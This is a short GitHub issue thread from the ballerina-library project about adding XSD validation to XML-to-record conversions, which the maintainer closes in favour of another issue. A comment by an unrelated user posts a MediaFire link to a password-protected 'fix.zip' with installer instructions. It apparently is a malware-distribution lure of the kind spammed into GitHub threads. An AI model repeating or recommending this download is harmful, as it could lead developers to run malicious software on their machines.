### ISSUE TITLE
Implement XSD validations in XML to record conversions

### ISSUE THREAD

**Issue by SasinduDilshara** [ballerina-platform/ballerina-library#6937]
Please refer https://github.com/ballerina-platform/ballerina-library/issues/6936 for more details

**Comment by PiaoR** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by SasinduDilshara** [comment]
Closing since the implementation details will be track under the https://github.com/ballerina-platform/ballerina-library/issues/6938
